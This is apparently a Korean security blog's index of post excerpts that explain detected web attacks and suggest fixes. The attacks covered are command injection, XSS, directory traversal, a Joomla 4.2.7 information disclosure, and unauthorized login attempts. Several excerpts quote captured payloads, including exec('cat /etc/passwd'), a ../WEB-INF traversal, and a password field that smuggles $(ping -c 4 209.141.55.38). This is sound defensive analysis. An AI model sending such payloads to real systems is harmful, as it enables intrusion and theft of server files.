jarvis-concert 님의 블로그

공격설명명령어 주입 취약점은 웹 어플리케이션에서 발생하는 보안 취약성 중 하나로, 명령 프롬프트나 셸 명령어를 실행하는 부분에서 발생할 수 있다. 공격자는 Command Injection 공격을 통해 웹 서버의 민감한 정보 획득할 수 있고 그에 따라 DB 탈취 및 사용자 인증 우회 등의 연계된 공격을 수행할 수 있다.공격구문 bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw 조치방안서버측에서 정보누출 취약점 및 에러페이지 설정을 해줘야한다 ## 주요정보통신기반시설 취약점 진단 가이드 참고https://www.kisa.or.kr/2060204/form?postSeq=12&lang_type=KO&page=1#fnPostAttachDownload

공격설명웹어플리케이션에서 쿼리가 전송되는 곳에 시스템 명령어를 허용하여 삽입되는 공격기법으로 취약한 어플리케이션의 경우 서버의 시스템 명령어가 웹상에서 실행되어 지기도 합니다. 취약한 어플리케이션의 경우 공격자는 아래의 명령어를 시스템상에 입력하여 결과값을 얻어내기도 합니다. 공격구문POST / HTTP/1.1 host: Accept-Encoding: gzip, deflate Accept-Language: zh_CN CloudFront-Forwarded-Proto: hxxp CloudFront-Is-Desktop-Viewer: true CloudFront-Is-Mobile-Viewer: false CloudFront-Is-SmartTV-Viewer: false CloudFront-Is-Tablet-Vie..

POST 메서드를 통해 전달되는 모든 데이터가 악의적인 것은 아니며, 본문 내 악의적인 코드가 포함되었다고 해서 무조건 공격으로 판단할 수는 없다. 웹 애플리케이션은 정상적인 기능 수행을 위해 다양한 입력을 받으며, POST 본문에도 유효한 요청 데이터가 포함될 수 있다. 그러나 특정 패턴이 보이면 위험 요소로 볼 수 있다. 예를 들어, 아래와 같은 조건이 있으면 주의가 필요하다. 1. 시스템 명령어 호출 패턴: cat, ls, ping 등 시스템 명령어가 포함된 경우, 웹 서버에서 실행될 가능성이 있어 주의가 필요하다.2. 특수 문자 사용: |, ;, && 등은 명령어 구분자나 추가 명령어 연결에 사용되는 경우가 많다. 3. SQL 명령어 패턴: SELECT, DROP, INSERT 등 SQL 구문이 ..

공격설명사이트 간 스크립팅, 크로스 사이트 스크립팅은 웹 애플리케이션에서 많이 나타나는 취약점의 하나로 웹사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입할 수 있는 취약점이다. 공격구문GET /product/hxxps://pito.co.kr/hot_line/index.php?scode="> HTTP/1.1 Accept: Text/Html,Application/Xhtml Xml,Application/Xml;Q=0.9,*/*;Q=0.8 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0 Accept-Language: en-us,en;q=0.5 Accept..

공격설명1. HTTP 헤더 기반 공격: 제공된 헤더 정보에 문제가 있으면 공격자는 HTTP 헤더 인젝션 또는 HTTP 스플리팅 공격을 시도할 수 있습니다. 이는 헤더를 조작하여 서버의 응답을 변형하거나 다른 사용자에게 악의적인 결과를 발생시키도록 유도하는 공격입니다.예시: 공격자가 User-Agent 또는 다른 헤더 필드를 악의적인 코드로 변경하여 서버의 오작동을 유도할 수 있습니다. 2. SQL 인젝션 (SQL Injection): 서버에 전송되는 데이터가 SQL 쿼리에 직접 삽입되어, 데이터베이스의 구조를 조작하거나 악의적인 결과를 도출할 수 있습니다. 만약 서버가 전송된 데이터(예: 검색 쿼리)를 제대로 검증하지 않고 SQL 쿼리로 변환한다면, 공격자는 SQL 인젝션을 통해 데이터베이스에 접근하거나..

form 태그(name="search_form")에서 action 값에서 필터링이 미흡합니다. [취약한 코드 (검색 폼 예시)]      Search  [개선된 코드 (검색 폼 예시)]                    Search 주요 개선 사항: 1. POST 방식으로 전송: 검색어가 URL에 노출되지 않으며, 검색 결과 URL이 길어지는 문제도 해결됩니다. 2. CSRF 토큰 검증: 위조된 요청을 방지하여 CSRF 공격을 막습니다. 3. SQL 인젝션 방지: 사용자 입력을 SQL 쿼리에 직접 삽입하지 않고 Prepared Statement를 사용해 바인딩합니다. 4. XSS 방지: 사용자 입력을 그대로 출력하지 않고 htmlspecialchars()로 이스케이프 처리하여 악성 스크립트 실행을 방..

공격설명서버의 잘못된 설정 및 중요 파일의 위치 오류를 이용하여 직접 디렉터리나 파일에 접근하여 자료를 유출하고 위 변조하는 공격 시도가 탐지되었습니다.디렉토리 탐색 공격은 공격자가 응용 프로그램을 실행하는 서버에서 임의의 파일을 읽을 수 있도록 하는 웹 보안 취약점이며, "상위 디렉토리로 이동"을 나타내는 문자인 “../”를 사용하여 최상위 루트 디렉토리에 접근이 가능합니다.공격자는 서버의 임의의 파일에 접근하여 응용 프로그램 데이터 또는 동작을 수정하고 제어할 수 있습니다.해당 파일에 접근이 가능할 경우, 웹 구성 정보 및 기타 파일 정보와 관련된 정보가 공격자에게 노출될 수 있습니다. 공격구문GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF H..

공격설명Joomla! 4.2.7 버전에서 발생하는 Webservice Unauthenticated Information Disclosure 취약점은, 웹 서비스 API가 인증되지 않은 상태에서도 특정 정보를 노출할 수 있는 보안 문제입니다. 이는 공격자가 웹 애플리케이션의 구조나 데이터에 대한 민감한 정보를 얻을 수 있게 하여 추가적인 공격을 가능하게 할 수 있습니다.  이러한 취약점은 일반적으로 다음과 같은 문제를 야기할 수 있습니다시스템의 내부 정보(예: 경로, 사용자 이름 등) 노출데이터베이스 정보 및 설정 파일 정보 노출 가능성공격자가 취약점을 활용해 시스템의 취약성을 더욱 심각하게 만들 수 있음 공격구문GET /api/index.php/v1/config/application?public=true..

공격설명인가받지 않는 사용자가 권한 없이 시스템이나 데이터에 접근할 경우 이벤트가 탐지될 수 있습니다.악의적인 행위자가 시스템에 불법적으로 침입하여 중요 정보를 유출하거나 시스템을 손상시킬 수 있는 위험을 초래합니다.여기서 URI : /view-source는 클라이언트가 웹 페이지의 소스 코드를 보려고 시도하는 것을 의미할 수 있습니다. 이는 브라우저 개발 도구나 view-source: 명령어를 사용해 특정 웹 페이지의 HTML, 자바스크립트 등 내부 코드를 확인하려는 시도를 의미할 수 있습니다.그러나 의심스러운 경우는, 공격자가 웹 페이지의 소스 코드를 분석하여 보안 취약점을 찾으려 할 때입니다. 예를 들어, 공격자는 소스 코드 내에서 주석으로 숨겨진 정보나 보안상 민감한 정보를 발견하려고 시도할 수 ..

공격설명비인가 접근 시도가 탐지되었습니다 .인가받지 않는 사용자가 권한 없이 시스템이나 데이터에 접근할 경우 이벤트가 탐지될 수 있습니다.악의적인 행위자가 시스템에 불법적으로 침입하여 중요 정보를 유출하거나 시스템을 손상시킬 수 있는 위험을 초래합니다. 공격구문GET /forms/doLogin?login_username=admin&password=password$(ping -c 4 209.141.55.38) HTTP/1.1Host: User-Agent: Linux Gnu (cow) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encodi..